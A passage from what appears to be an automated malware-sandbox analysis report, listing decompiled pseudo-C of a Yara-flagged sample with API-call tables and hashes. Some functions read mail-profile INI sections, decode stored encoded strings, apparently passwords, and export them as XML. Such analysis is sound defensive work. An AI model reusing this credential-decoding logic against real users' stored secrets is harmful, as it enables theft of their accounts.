						_v15 = 0;
						_t50 = 0;
						_t31 =  &_v1036;
						while(1) {
							_t30 = strlen(_t31);
							_v8 = _t30;
							if(_t30 <= 0) {
								goto L11;
							}
							_t54 =  &_v2900;
							E004021D8( &_v2900);
							if(strchr(_t55 + _t50 - 0x408, 0x3d) != 0 && E0040314D(_t54, _a4 + 0xd2a, _t34 + 1) != 0) {
								E00402407(_t54, _t62, _a4);
							}
							_t30 = _v8;
							_t50 = _t50 + _t30 + 1;
							if(_t50 >= 0x3ff) {
								goto L11;
							} else {
								_t31 = _t55 + _t50 - 0x408;
								continue;
							}
						}
						goto L11;
					}
				}
				return _t23;
			}



















                                                                        0x0040329e
                                                                        0x004032ac
                                                                        0x004032b6
                                                                        0x004032bd
                                                                        0x004032c3
                                                                        0x004032d3
                                                                        0x004032da
                                                                        0x004032da
                                                                        0x004032ec
                                                                        0x004032f2
                                                                        0x0040330c
                                                                        0x00403314
                                                                        0x00403390
                                                                        0x00000000
                                                                        0x00403316
                                                                        0x00403316
                                                                        0x00403319
                                                                        0x0040331c
                                                                        0x0040331f
                                                                        0x00403322
                                                                        0x00403324
                                                                        0x00403382
                                                                        0x00403383
                                                                        0x0040338a
                                                                        0x0040338e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040332c
                                                                        0x00403332
                                                                        0x0040334a
                                                                        0x00403367
                                                                        0x00403367
                                                                        0x0040336c
                                                                        0x0040336f
                                                                        0x00403379
                                                                        0x00000000
                                                                        0x0040337b
                                                                        0x0040337b
                                                                        0x00000000
                                                                        0x0040337b
                                                                        0x00403379
                                                                        0x00000000
                                                                        0x00403382
                                                                        0x00403314
                                                                        0x00403394

                                                                        APIs
                                                                          • Part of subcall function 0040314D: strchr.MSVCRT ref: 00403262
                                                                        • memset.MSVCRT ref: 004032F2
                                                                        • GetPrivateProfileSectionA.KERNEL32 ref: 0040330C
                                                                        • strchr.MSVCRT ref: 00403341
                                                                          • Part of subcall function 00402407: _mbsicmp.MSVCRT ref: 0040243F
                                                                        • strlen.MSVCRT ref: 00403383
                                                                          • Part of subcall function 00402407: _mbscmp.MSVCRT ref: 0040241B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                        • String ID: Personalities
                                                                        • API String ID: 2103853322-4287407858
                                                                        • Opcode ID: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                                        • Instruction ID: ece583472a64ba9cf1aca627ef0740b0f3020b1d2d3fce26046d940835a048de
                                                                        • Opcode Fuzzy Hash: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                                        • Instruction Fuzzy Hash: 8C21BA72A00108AADB119F69DD81ADE7F6C9F50349F0040BBEA45F3181DA38EF86866D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040F037, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E0040F037(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;

				_t7 = 0;
				_t8 = LoadLibraryA("shlwapi.dll");
				_t3 = GetProcAddress(_t8, "SHAutoComplete");
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}






                                                                        0x0040f03e
                                                                        0x0040f046
                                                                        0x0040f04e
                                                                        0x0040f056
                                                                        0x0040f063
                                                                        0x0040f063
                                                                        0x0040f066
                                                                        0x0040f070

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,745D48C0,00405C41,00000000), ref: 0040F040
                                                                        • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F04E
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0040F066
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Library$AddressFreeLoadProc
                                                                        • String ID: SHAutoComplete$shlwapi.dll
                                                                        • API String ID: 145871493-1506664499
                                                                        • Opcode ID: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                                        • Instruction ID: e435a3077eadc7ffcc94e3fda903fcc6a6103b68d0c251917c13f6f883115a60
                                                                        • Opcode Fuzzy Hash: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                                        • Instruction Fuzzy Hash: 70D0C2323002106B96605B326C0CAEB2D55EBC47527048032F505E1250EB648A86C1A8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00407406, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 104stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 87%
                                                                        			E00407406(char* __eax, intOrPtr* _a4, char _a8) {
				signed int _v8;
				int _v12;
				char* _v16;
				char _v20;
				signed int* _v24;
				char _v28;
				void _v284;
				char _v540;
				char _v1068;
				void _v3115;
				char _v3116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t36;
				signed int _t40;
				signed int* _t61;
				char _t69;
				char* _t74;
				char* _t75;
				intOrPtr* _t76;
				signed int _t78;
				int _t80;
				void* _t83;
				void* _t84;
				signed int _t89;

				_t74 = __eax;
				_t35 = strlen(__eax);
				_t78 = _t35;
				_t36 = _t35 & 0x80000001;
				if(_t36 < 0) {
					_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
					_t89 = _t36;
				}
				if(_t89 != 0 || _t78 <= 0x20) {
					return _t36;
				} else {
					_v3116 = 0;
					memset( &_v3115, 0, 0x7ff);
					_v8 = _v8 & 0x00000000;
					_t61 = _a4 + 4;
					_t40 =  *_t61 | 0x00000001;
					if(_t78 <= 4) {
						L7:
						_t79 =  &_v1068;
						E004046D7( &_v1068);
						if(E004047A0( &_v1068, _t93) != 0) {
							_v20 = _v8;
							_v16 =  &_v3116;
							_v28 = 0x10;
							_v24 = _t61;
							if(E00404811(_t79,  &_v20,  &_v28,  &_v12) != 0) {
								_t80 = _v12;
								if(_t80 > 0xff) {
									_t80 = 0xff;
								}
								_v540 = 0;
								_v284 = 0;
								memcpy( &_v284, _v8, _t80);
								_t27 =  &_a8; // 0x407626
								_t75 =  &_v540;
								 *((char*)(_t84 + _t80 - 0x118)) = 0;
								E004060D0(0xff, _t75,  *_t27);
								 *((intOrPtr*)( *_a4))(_t75);
								LocalFree(_v8);
							}
						}
						return E004047F1( &_v1068);
					}
					_t76 = _t74 + 5;
					_t83 = (_t78 + 0xfffffffb >> 1) + 1;
					do {
						_t69 = ( *((intOrPtr*)(_t76 - 1)) - 0x00000001 << 0x00000004 |  *_t76 - 0x00000021) - _t40;
						_t40 = _t40 * 0x10ff5;
						_t76 = _t76 + 2;
						_v8 = _v8 + 1;
						_t83 = _t83 - 1;
						_t93 = _t83;
						 *((char*)(_t84 + _v8 - 0xc28)) = _t69;
					} while (_t83 != 0);
					goto L7;
				}
			}






























                                                                        0x00407412
                                                                        0x00407415
                                                                        0x0040741a
                                                                        0x0040741c
                                                                        0x00407422
                                                                        0x00407428
                                                                        0x00407428
                                                                        0x00407428
                                                                        0x00407429
                                                                        0x0040754a
                                                                        0x00407438
                                                                        0x00407446
                                                                        0x0040744d
                                                                        0x00407455
                                                                        0x00407459
                                                                        0x00407461
                                                                        0x00407467
                                                                        0x0040749b
                                                                        0x0040749b
                                                                        0x004074a1
                                                                        0x004074ad
                                                                        0x004074b6
                                                                        0x004074bf
                                                                        0x004074d0
                                                                        0x004074d7
                                                                        0x004074e1
                                                                        0x004074e3
                                                                        0x004074ed
                                                                        0x004074ef
                                                                        0x004074ef
                                                                        0x004074fc
                                                                        0x00407503
                                                                        0x0040750a
                                                                        0x0040750f
                                                                        0x00407512
                                                                        0x00407518
                                                                        0x00407520
                                                                        0x00407530
                                                                        0x00407535
                                                                        0x00407535
                                                                        0x004074e1
                                                                        0x00000000
                                                                        0x00407541
                                                                        0x0040746e
                                                                        0x00407471
                                                                        0x00407472
                                                                        0x00407484
                                                                        0x00407486
                                                                        0x0040748d
                                                                        0x0040748e
                                                                        0x00407491
                                                                        0x00407491
                                                                        0x00407492
                                                                        0x00407492
                                                                        0x00000000
                                                                        0x00407472

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLocalmemcpymemsetstrlen
                                                                        • String ID: &v@
                                                                        • API String ID: 3110682361-3426253984
                                                                        • Opcode ID: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                                        • Instruction ID: 0225f7a5d6cb17f6a7661d1d380ab710e59dbb599c3936da0c6da93344c8566d
                                                                        • Opcode Fuzzy Hash: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                                        • Instruction Fuzzy Hash: B731F772D0411DABDB10DB68CC81BDEBBB8EF45318F1001B6E645B3281DA78AE858B95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409695, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 84%
                                                                        			E00409695(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v259;
				char _v260;
				signed int _t34;
				char* _t45;
				void* _t47;

				E00405EFD(_a4, "<item>\r\n");
				_t34 = 0;
				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						E0040F09D( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4),  *((intOrPtr*)(__edi + 0x4c))),  *((intOrPtr*)(__edi + 0x50)));
						_t45 =  &_v260;
						E00409018(_t45,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
						sprintf( *(__edi + 0x54), "<%s>%s</%s>\r\n", _t45,  *((intOrPtr*)(__edi + 0x50)), _t45);
						E00405EFD(_a4,  *(__edi + 0x54));
						_t47 = _t47 + 0x28;
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__edi + 0x20)));
				}
				return E00405EFD(_a4, "</item>\r\n");
			}








                                                                        0x004096a7
                                                                        0x004096ac
                                                                        0x004096b3
                                                                        0x004096b6
                                                                        0x004096c4
                                                                        0x004096cb
                                                                        0x004096e7
                                                                        0x004096f6
                                                                        0x004096fc
                                                                        0x00409710
                                                                        0x0040971b
                                                                        0x00409720
                                                                        0x00409723
                                                                        0x00409724
                                                                        0x00409729
                                                                        0x0040973b

                                                                        APIs
                                                                          • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                          • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                        • memset.MSVCRT ref: 004096CB
                                                                          • Part of subcall function 0040F09D: memcpy.MSVCRT ref: 0040F10B
                                                                          • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                          • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                        • sprintf.MSVCRT ref: 00409710
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
                                                                        • String ID: <%s>%s</%s>$</item>$<item>
                                                                        • API String ID: 3200591283-2769808009
                                                                        • Opcode ID: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                        • Instruction ID: f0c093cdac9801847eaa7418f237768de61d650e358e632480a4b045718b8cde
                                                                        • Opcode Fuzzy Hash: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                        • Instruction Fuzzy Hash: FE11E731500515BFC711AF25CC42E967B64FF04318F10006AF549369A2EB76BA64DFD8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040A4C8, Relevance: 7.5, APIs: 5, Instructions: 47windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040A4C8(void* __eax) {
				void* __esi;
				void* _t16;
				void* _t33;
				void* _t38;
				void* _t41;

				_t41 = __eax;
				_t16 = E00401033();
				if(_t16 == 0x5cb8) {
					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 0, 0);
					E00405E2C();
					 *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)) + 0x28)) = 0;
					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0x1009, 0, 0);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x5c))(_t38, _t33);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x74))(1);
					E0040A437(_t41);
					SetCursor( *0x416b98);
					SetFocus( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184));
					return SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 1, 0);
				}
				return _t16;
			}








                                                                        0x0040a4c9
                                                                        0x0040a4cb
                                                                        0x0040a4d5
                                                                        0x0040a4f5
                                                                        0x0040a4f7
                                                                        0x0040a504
                                                                        0x0040a518
                                                                        0x0040a522
                                                                        0x0040a52f
                                                                        0x0040a532
                                                                        0x0040a53d
                                                                        0x0040a54f
                                                                        0x00000000
                                                                        0x0040a569
                                                                        0x0040a56b

                                                                        APIs
                                                                        • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040A4F5
                                                                          • Part of subcall function 00405E2C: LoadCursorA.USER32 ref: 00405E33
                                                                          • Part of subcall function 00405E2C: SetCursor.USER32(00000000,?,0040BAC6), ref: 00405E3A
                                                                        • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040A518
                                                                          • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A45D
                                                                          • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A487
                                                                          • Part of subcall function 0040A437: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                          • Part of subcall function 0040A437: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A4C0
                                                                        • SetCursor.USER32(?,?,0040B6B6), ref: 0040A53D
                                                                        • SetFocus.USER32(?,?,?,0040B6B6), ref: 0040A54F
                                                                        • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040A566
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
                                                                        • String ID:
                                                                        • API String ID: 2210206837-0
                                                                        • Opcode ID: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                        • Instruction ID: 5ceab2a0550c6f7be61398745e2f8fe4621b0361104972d0b8848fcf02267a2c
                                                                        • Opcode Fuzzy Hash: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                        • Instruction Fuzzy Hash: 12116DB1200600EFD722AB74DC85FAA77EDFF48344F0644B9F1599B2B1CA716D018B10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409867, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00409867(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				char* _t28;

				_t26 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				E00405EFD(_a4, "<?xml version=\"1.0\"  encoding=\"ISO-8859-1\" ?>\r\n");
				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
				_t28 =  &_v260;
				E00409018(_t28, _t17);
				sprintf( &_v516, "<%s>\r\n", _t28);
				return E00405EFD(_a4,  &_v516);
			}











                                                                        0x00409881
                                                                        0x00409883
                                                                        0x0040988a
                                                                        0x00409899
                                                                        0x004098a0
                                                                        0x004098ad
                                                                        0x004098b9
                                                                        0x004098bd
                                                                        0x004098c3
                                                                        0x004098d7
                                                                        0x004098f1

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040988A
                                                                        • memset.MSVCRT ref: 004098A0
                                                                          • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                          • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                          • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                          • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                        • sprintf.MSVCRT ref: 004098D7
                                                                        Strings
                                                                        • <%s>, xrefs: 004098D1
                                                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 004098A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                        • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                        • API String ID: 3202206310-1998499579
                                                                        • Opcode ID: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                        • Instruction ID: 66925a684df18266fce8bb701fa3a75b356ea9bacad4fe0319972b489c667c97
                                                                        • Opcode Fuzzy Hash: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                        • Instruction Fuzzy Hash: BC01A77290011976D721A759CC46FDA7B6C9F44304F0400FAB509B3192DB789F858BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00408572, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 76%
                                                                        			E00408572(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x24));
				if(_t9 != 0) {
					_push(_t9);
					L004115D6();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x34));
				if(_t10 != 0) {
					_push(_t10);
					L004115D6();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x1b4));
				if(_t11 != 0) {
					_push(_t11);
					L004115D6();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x1a0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L004115D6();
						 *_t18 = 0;
					}
					_push(_t18);
					L004115D6();
				}
				 *((intOrPtr*)(_t19 + 0x1a0)) = 0;
				 *((intOrPtr*)(_t19 + 0x24)) = 0;
				 *((intOrPtr*)(_t19 + 0x34)) = 0;
				 *((intOrPtr*)(_t19 + 0x1b4)) = 0;
				return _t11;
			}








                                                                        0x00408572
                                                                        0x00408572
                                                                        0x0040857b
                                                                        0x0040857d
                                                                        0x0040857e
                                                                        0x00408583
                                                                        0x00408584
                                                                        0x00408589
                                                                        0x0040858b
                                                                        0x0040858c
                                                                        0x00408591
                                                                        0x00408592
                                                                        0x0040859a
                                                                        0x0040859c
                                                                        0x0040859d
                                                                        0x004085a2
                                                                        0x004085a3
                                                                        0x004085ab
                                                                        0x004085ad
                                                                        0x004085b1
                                                                        0x004085b3
                                                                        0x004085b4
                                                                        0x004085ba
                                                                        0x004085ba
                                                                        0x004085bc
                                                                        0x004085bd
                                                                        0x004085c2
                                                                        0x004085c4
                                                                        0x004085ca
                                                                        0x004085cd
                                                                        0x004085d0
                                                                        0x004085d7

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                        • Instruction ID: 0a64c6e0650ef7a992325d71cca8afebdafc0e64b7e6075a64aa0ecb46f153ec
                                                                        • Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                        • Instruction Fuzzy Hash: C2F0F4725057016FDB209F6A99C0497B7D6BB48714B64083FF18AD3741CF78AD818A18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004085D8, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 70%
                                                                        			E004085D8(intOrPtr* __edi) {
				void* __esi;
				void** _t7;
				intOrPtr* _t12;
				intOrPtr* _t18;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;

				_t18 = __edi;
				 *__edi = 0x413320;
				E00408572(__edi);
				_t21 =  *((intOrPtr*)(__edi + 0x10));
				if(_t21 != 0) {
					E00406B5B(_t21);
					_push(_t21);
					L004115D6();
				}
				_t22 =  *((intOrPtr*)(_t18 + 0xc));
				if(_t22 != 0) {
					E00406B5B(_t22);
					_push(_t22);
					L004115D6();
				}
				_t23 =  *((intOrPtr*)(_t18 + 8));
				if(_t23 != 0) {
					E00406B5B(_t23);
					_push(_t23);
					L004115D6();
				}
				_t24 =  *((intOrPtr*)(_t18 + 4));
				if(_t24 != 0) {
					E00406B5B(_t24);
					_push(_t24);
					L004115D6();
				}
				_t12 = _t18;
				_t7 =  *((intOrPtr*)( *_t12))();
				free( *_t7);
				return _t7;
			}











                                                                        0x004085d8
                                                                        0x004085db
                                                                        0x004085e1
                                                                        0x004085e6
                                                                        0x004085eb
                                                                        0x004085ed
                                                                        0x004085f2
                                                                        0x004085f3
                                                                        0x004085f8
                                                                        0x004085f9
                                                                        0x004085fe
                                                                        0x00408600
                                                                        0x00408605
                                                                        0x00408606
                                                                        0x0040860b
                                                                        0x0040860c
                                                                        0x00408611
                                                                        0x00408613
                                                                        0x00408618
                                                                        0x00408619
                                                                        0x0040861e
                                                                        0x0040861f
                                                                        0x00408624
                                                                        0x00408626
                                                                        0x0040862b
                                                                        0x0040862c
                                                                        0x00408631
                                                                        0x00408632
                                                                        0x0040863c
                                                                        0x00408640
                                                                        0x00408646

                                                                        APIs
                                                                          • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                                          • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                          • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                          • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                          • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004085F3
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00408606
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00408619
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040862C
                                                                        • free.MSVCRT(00000000), ref: 00408640
                                                                          • Part of subcall function 00406B5B: free.MSVCRT(00000000,00406DE2,00000000,?,?), ref: 00406B62
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??3@$free
                                                                        • String ID:
                                                                        • API String ID: 2241099983-0
                                                                        • Opcode ID: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                        • Instruction ID: 9ddd328a78e70669a2f2a4495a49ad6ad9a3331e0dda25fcf26d4743fc91c851
                                                                        • Opcode Fuzzy Hash: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                        • Instruction Fuzzy Hash: E3F0F6729028306BC9213B275011A8EB3657D4171431B056FF946BB7A28F3C6E9246FD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040E81A, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 19%
                                                                        			E0040E81A(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, intOrPtr _a12) {
				void* __esi;
				void* _t11;
				void* _t26;
				void* _t27;

				_t26 = __edx;
				_t11 = _a4 - 0x110;
				_t27 = __ecx;
				if(_t11 == 0) {
					E0040E4A4(__ecx, __ecx, __eflags);
					E00406491(_t26,  *((intOrPtr*)(__ecx + 4)));
					L5:
					return E004015AE(_t27, _a4, _a8, _a12);
				}
				if(_t11 != 0x28 || E004062D1(_a12) == 0) {
					goto L5;
				} else {
					SetBkMode(_a8, 1);
					SetBkColor(_a8, GetSysColor(5));
					SetTextColor(_a8, 0xc00000);
					return GetSysColorBrush(5);
				}
			}







                                                                        0x0040e81a
                                                                        0x0040e820
                                                                        0x0040e826
                                                                        0x0040e828
                                                                        0x0040e871
                                                                        0x0040e879
                                                                        0x0040e87f
                                                                        0x00000000
                                                                        0x0040e88a
                                                                        0x0040e82d
                                                                        0x00000000
                                                                        0x0040e83c
                                                                        0x0040e841
                                                                        0x0040e853
                                                                        0x0040e861
                                                                        0x00000000
                                                                        0x0040e869

                                                                        APIs
                                                                          • Part of subcall function 004062D1: memset.MSVCRT ref: 004062F1
                                                                          • Part of subcall function 004062D1: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                          • Part of subcall function 004062D1: _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                                        • SetBkMode.GDI32(?,00000001), ref: 0040E841
                                                                        • GetSysColor.USER32(00000005), ref: 0040E849
                                                                        • SetBkColor.GDI32(?,00000000), ref: 0040E853
                                                                        • SetTextColor.GDI32(?,00C00000), ref: 0040E861
                                                                        • GetSysColorBrush.USER32(00000005), ref: 0040E869
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Color$BrushClassModeNameText_stricmpmemset
                                                                        • String ID:
                                                                        • API String ID: 1869857563-0
                                                                        • Opcode ID: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                                        • Instruction ID: 70d3a7b2db974a4d4567ef1bfe72cf66993607b5e30e9ab541cb73924f0fe55d
                                                                        • Opcode Fuzzy Hash: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
                                                                        • Instruction Fuzzy Hash: 8CF01D32100205BBDF152FA6DD09E9E3F25EF08711F10C53AFA19A51E1CAB5D970DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040B105, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E0040B105(intOrPtr __ecx, short _a4, short _a8) {
				char _v265;
				char _v520;
				char _v532;
				RECT* _v540;
				char _v560;
				intOrPtr _v564;
				char _v568;
				intOrPtr _v572;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t54;
				void* _t77;
				short _t85;
				short _t86;
				RECT* _t97;
				intOrPtr _t104;

				_t93 = __ecx;
				_t97 = 0;
				_t104 = __ecx;
				_v564 = __ecx;
				if(_a4 == 0 || _a4 == 1) {
					_t85 = _a8;
					if(_t85 == 0x9c42) {
						_t54 = DestroyWindow( *(_t104 + 0x108));
					}
					_t114 = _t85 - 0x9c49;
					if(_t85 == 0x9c49) {
